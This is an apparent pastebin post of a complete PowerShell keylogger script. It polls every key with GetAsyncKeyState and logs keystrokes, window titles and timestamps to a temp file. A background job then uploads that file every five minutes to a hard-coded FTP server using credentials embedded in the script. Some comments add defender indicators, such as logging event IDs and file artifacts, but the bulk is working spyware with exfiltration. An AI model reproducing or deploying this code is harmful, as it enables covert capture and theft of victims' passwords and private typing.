
Powershell Keylogger

a guest
Oct 2nd, 2016
  1. <#
  2.  
  3. PowerShell keystroke logger
  4.  
  5. Pasted together by
  6. |-TheDoctor-|
  7.  
  8. #>
  9. function KeyLog {
  10.     # Polls every virtual-key code in an endless loop and appends each translated keystroke, with the foreground window title and a timestamp, to $env:temp\key.log. Takes no parameters and has no exit path.
  11.     # MapVirtualKey map types (values for the uMapType argument)
  12.     # <summary>
  13.     # uCode is a virtual-key code and is translated into a scan code.
  14.     # If it is a virtual-key code that does not distinguish between left- and
  15.     # right-hand keys, the left-hand scan code is returned.
  16.     # If there is no translation, the function returns 0.
  17.     # </summary>
  18.     $MAPVK_VK_TO_VSC = 0x00
  19.  
  20.     # <summary>
  21.     # uCode is a scan code and is translated into a virtual-key code that
  22.     # does not distinguish between left- and right-hand keys. If there is no
  23.     # translation, the function returns 0.
  24.     # </summary>
  25.     $MAPVK_VSC_TO_VK = 0x01
  26.  
  27.     # <summary>
  28.     # uCode is a virtual-key code and is translated into an unshifted
  29.     # character value in the low-order word of the return value. Dead keys (diacritics)
  30.     # are indicated by setting the top bit of the return value. If there is no
  31.     # translation, the function returns 0.
  32.     # </summary>
  33.     $MAPVK_VK_TO_CHAR = 0x02
  34.  
  35.     # <summary>
  36.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  37.     # virtual-key code that distinguishes between left- and right-hand keys. If
  38.     # there is no translation, the function returns 0.
  39.     # </summary>
  40.     $MAPVK_VSC_TO_VK_EX = 0x03
  41.  
  42.     # <summary>
  43.     # Not currently documented
  44.     # </summary>
  45.     $MAPVK_VK_TO_VSC_EX = 0x04
  46.     # C# P/Invoke declarations for user32.dll, held as here-strings and compiled at run time by the Add-Type calls below. For defenders: PowerShell text that pairs Add-Type/DllImport with GetAsyncKeyState is a strong keystroke-capture indicator and is recorded by script block logging (event ID 4104) when that is enabled.
  47.     $virtualkc_sig = @'
  48. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  49. public static extern short GetAsyncKeyState(int virtualKeyCode);
  50. '@
  51.  
  52.     $kbstate_sig = @'
  53. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  54. public static extern int GetKeyboardState(byte[] keystate);
  55. '@
  56.  
  57.     $mapchar_sig = @'
  58. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  59. public static extern int MapVirtualKey(uint uCode, int uMapType);
  60. '@
  61.  
  62.     $tounicode_sig = @'
  63. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  64. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  65. '@
  66.     # Each Add-Type call compiles one signature into a type in the Win32Functions namespace; -passThru returns that type so its static method can be invoked with ::. On Windows PowerShell this step typically launches csc.exe as a child process, which endpoint telemetry can alert on.
  67.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  68.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  69.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  70.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  71.     # Look for an existing [User32] type; if that reference throws, the catch block emits one into an in-memory dynamic assembly (AssemblyBuilderAccess Run) via Reflection.Emit. It defines five user32.dll methods, but only GetForegroundWindow is called through $ImportDll in this function.
  72.     try
  73.             {
  74.                 $ImportDll = [User32]
  75.             }
  76.             catch
  77.             {
  78.                 $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
  79.                 $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
  80.                 $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
  81.                 $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')
  82.                 # DllImportAttribute named fields; each $FieldValueArray below supplies values in this same order.
  83.                 $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  84.                 $FieldArray = [Reflection.FieldInfo[]] @(
  85.                     [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  86.                     [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
  87.                     [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
  88.                     [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
  89.                     [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
  90.                     [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
  91.                 )
  92.  
  93.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
  94.                 $FieldValueArray = [Object[]] @(
  95.                     'GetAsyncKeyState',
  96.                     $True,
  97.                     $False,
  98.                     $True,
  99.                     [Runtime.InteropServices.CallingConvention]::Winapi,
  100.                     [Runtime.InteropServices.CharSet]::Auto
  101.                 )
  102.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
  103.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
  104.  
  105.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
  106.                 $FieldValueArray = [Object[]] @(
  107.                     'GetKeyboardState',
  108.                     $True,
  109.                     $False,
  110.                     $True,
  111.                     [Runtime.InteropServices.CallingConvention]::Winapi,
  112.                     [Runtime.InteropServices.CharSet]::Auto
  113.                 )
  114.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
  115.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
  116.  
  117.                 $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
  118.                 $FieldValueArray = [Object[]] @(
  119.                     'MapVirtualKey',
  120.                     $False,
  121.                     $False,
  122.                     $True,
  123.                     [Runtime.InteropServices.CallingConvention]::Winapi,
  124.                     [Runtime.InteropServices.CharSet]::Auto
  125.                 )
  126.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
  127.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
  128.  
  129.                 $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
  130.                     [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
  131.                 $FieldValueArray = [Object[]] @(
  132.                     'ToUnicode',
  133.                     $False,
  134.                     $False,
  135.                     $True,
  136.                     [Runtime.InteropServices.CallingConvention]::Winapi,
  137.                     [Runtime.InteropServices.CharSet]::Auto
  138.                 )
  139.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
  140.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
  141.  
  142.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
  143.                 $FieldValueArray = [Object[]] @(
  144.                     'GetForegroundWindow',
  145.                     $True,
  146.                     $False,
  147.                     $True,
  148.                     [Runtime.InteropServices.CallingConvention]::Winapi,
  149.                     [Runtime.InteropServices.CharSet]::Auto
  150.                 )
  151.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
  152.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
  153.                 # Finalize the emitted type so its static methods become callable.
  154.                 $ImportDll = $TypeBuilder.CreateType()
  155.             }
  156.     # Capture loop: sleeps 40 ms per pass, then checks virtual-key codes 1 through 254. There is no break condition.
  157.     while ($true) {
  158.         Start-Sleep -Milliseconds 40
  159.         $gotit = ""
  160.  
  161.         for ($char = 1; $char -le 254; $char++) {
  162.             $vkey = $char
  163.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
  164.  
  165.             if ($gotit -eq -32767) {
  166.                 # -32767 is 0x8001 as a signed 16-bit value, i.e. both the top and bottom bits of the GetAsyncKeyState result are set. Only then is a record built.
  167.                 $EnterKey = $getKeyState::GetAsyncKeyState(13)
  168.                 $TabKey = $getKeyState::GetAsyncKeyState(9)
  169.                 $DeleteKey = $getKeyState::GetAsyncKeyState(46)
  170.                 $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
  171.                 $LeftArrow = $getKeyState::GetAsyncKeyState(37)
  172.                 $UpArrow = $getKeyState::GetAsyncKeyState(38)
  173.                 $RightArrow = $getKeyState::GetAsyncKeyState(39)
  174.                 $DownArrow = $getKeyState::GetAsyncKeyState(40)
  175.  
  176.                 $caps_lock = [console]::CapsLock
  177.  
  178.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  179.  
  180.                 $kbstate = New-Object Byte[] 256
  181.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  182.  
  183.                 $TopWindow = $ImportDll::GetForegroundWindow()
  184.                 $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
  185.                 # Every record begins with the quoted title of the foreground window, so the log also reveals which application received the keystrokes.
  186.                 $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
  187.  
  188.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
  189.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  190.  
  191.                 $LogOutput += $mychar.ToString();
  192.                
  193.                 if ($EnterKey)     {$LogOutput += '[ENTER]'}
  194.                 if ($TabKey)       {$LogOutput += '[Tab]'}
  195.                 if ($DeleteKey)    {$LogOutput += '[Delete]'}
  196.                 if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
  197.                 if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}
  198.                 if ($RightArrow)   {$LogOutput += '[Right Arrow]'}
  199.                 if ($UpArrow)      {$LogOutput += '[Up Arrow]'}
  200.                 if ($DownArrow)    {$LogOutput += '[Down Arrow]'}
  201.  
  202.                 $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
  203.                 $LogOutput += "`t`t`t`t`t" + $TimeStamp
  204.                 # Host artifact for responders: records accumulate in key.log under the user's temp directory, written only when ToUnicode reported at least one character.
  205.                 if ($unicode_res -gt 0) {
  206.                     $logfile = "$env:temp\key.log"
  207.                     $LogOutput | Out-File -FilePath $logfile -Append
  208.                 }
  209.             }
  210.         }
  211.     }
  212. }
  213.  
  214. Start-Job {
  215.     # Background job: after each $SleepTime-second wait it uploads the whole $LocalFile to $RemoteFile over FTP. It is started before the blocking KeyLog call at the end of the script.
  216.     # Config: hard-coded FTP account, host and remote path. No EnableSsl is set on the request, so credentials and log contents cross the network as plain FTP and are observable by network monitoring; the values below are indicators taken from this sample.
  217.     $Username = "russenzeug"
  218.     $Password = "w0dk4f0rth34rmy"
  219.     $LocalFile = "$env:temp\key.log"
  220.     $RemoteFile = "ftp://russenzeug.bplaced.net/Logs/Log.txt"
  221.     $SleepTime = 300
  222.  
  223.     while (1 -eq 1)
  224.     {
  225.         # Sleep for specified time
  226.         Start-Sleep -Seconds $SleepTime
  227.  
  228.         # Create FTP Request Object
  229.         $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
  230.         $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
  231.         $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
  232.         $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
  233.         $FTPRequest.UseBinary = $true
  234.         $FTPRequest.UsePassive = $true
  235.  
  236.         # Read the File for Upload (gc -en byte is Get-Content -Encoding Byte: the file is read as a byte array)
  237.         $FileContent = gc -en byte $LocalFile
  238.         $FTPRequest.ContentLength = $FileContent.Length
  239.  
  240.         # Get Stream Request by bytes
  241.         $Run = $FTPRequest.GetRequestStream()
  242.         $Run.Write($FileContent, 0, $FileContent.Length)
  243.  
  244.         # Cleanup
  245.         $Run.Close()
  246.         $Run.Dispose()
  247.     }
  248. }
  249. # Start capturing in the current session; KeyLog loops forever, so nothing after this line would run.
  250. KeyLog